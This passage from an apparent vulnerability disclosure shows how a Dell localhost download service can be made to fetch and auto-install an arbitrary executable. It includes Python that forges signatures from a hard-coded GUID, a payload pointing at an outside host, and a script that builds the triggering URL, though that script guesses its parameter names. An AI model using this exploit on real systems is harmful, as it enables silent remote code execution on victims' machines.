        ErrorLog.WriteLog("Not authenticated");
    return flag;
}

Wow. Ok, so not exactly the hardest thing to break. The service, method, expiration and signature arguments are all attacker controlled and passed through GET arguments. The only thing not controlled by a remote attacker is the hard-coded GUID "37d42206-2f68-48be-a09a-9f9b6424ad85".

Essentially all the function does is create a string with the arguments and the GUID then compare it with the one the user has given, and if it is a match the user is 'authenticated'. With this information in hand we can create a simple Python function to generate a valid signature:

import base64
import hashlib
import time

def make_signature(service, method):
    expiration = int(time.time()) + 400000

    secret_string = "{}_{}_{}_{}".format(
        service, method, expiration, "37d42206-2f68-48be-a09a-9f9b6424ad85"
    )

    hashed = hashlib.sha256(secret_string.encode("utf-8"))
    print("Secret: {}".format(secret_string))
    print("Hash: {}".format(hashed.hexdigest()))
    return expiration, base64.b64encode(hashed.digest()).rstrip(b"=")

If we can generate a valid token then we can trigger the "downloadandautoinstall" method with our arbitrary file by causing the user's browser to make a GET request, which is very easy to do. A simple way would be to embed an image in a web page with the source set to "http://localhost:8884/downloadservice/downloadandautoinstall" along with the appropriate GET arguments. After some investigation it seems that the DownloadAndAutoInstall method needs a list of JSON strings containing information about the files to download and install. Sending a JSON object like the following with a valid signature will trigger a download:

{
    "Name": "messbox.exe",
    "InstallOrder": 1,
    "IsDownload": true,
    "IsAutoInstall": true,
    "Location": "http://www.greyhathacker.net/tools/messbox.exe"
}
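Putting the pieces together, here's a sketch of how an attacker might construct the full crafted URL to embed in an image tag. This assumes the signature and expiration come from the make_signature function above, and that method arguments are passed as query-string parameters (the signature value below is a placeholder, not a real one):

```python
import json
import urllib.parse

def build_exploit_url(expiration, signature, payload_url):
    # The "files" argument is a JSON list describing what to download
    # and install, matching the object shown above.
    files = json.dumps([{
        "Name": "messbox.exe",
        "InstallOrder": 1,
        "IsDownload": True,
        "IsAutoInstall": True,
        "Location": payload_url,
    }])
    # Pack everything into the query string of the localhost endpoint.
    query = urllib.parse.urlencode({
        "expires": expiration,
        "signature": signature,
        "files": files,
    })
    return "http://localhost:8884/downloadservice/downloadandautoinstall?" + query

url = build_exploit_url(1427000000, "fakesig",
                        "http://www.greyhathacker.net/tools/messbox.exe")
print(url)
```

Any page the victim visits can then reference this URL (e.g. as an image source) and the service will process the request with no user interaction.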

Conclusion

So in conclusion we can make anyone running this software download and install an arbitrary file by triggering their web browser to make a request to a crafted localhost URL. This can be achieved a number of ways, and the service will faithfully download and execute our payload without prompting the user.

I don't think Dell should be including all this functionality in such a simple tool, and they should have ensured adequate protection against malicious inputs. After contacting Dell and discussing the issue with their internal security team, they pushed out a fix that included obfuscating the downloaded binary. While I cannot be sure, I think they simply changed the conditional from "if dell in referrer" to "if dell in referrer domain name", which may be slightly harder to exploit but leaves the underlying issue just as severe. There is now also a prominent agreement you have to accept before downloading that specifies what the software can do.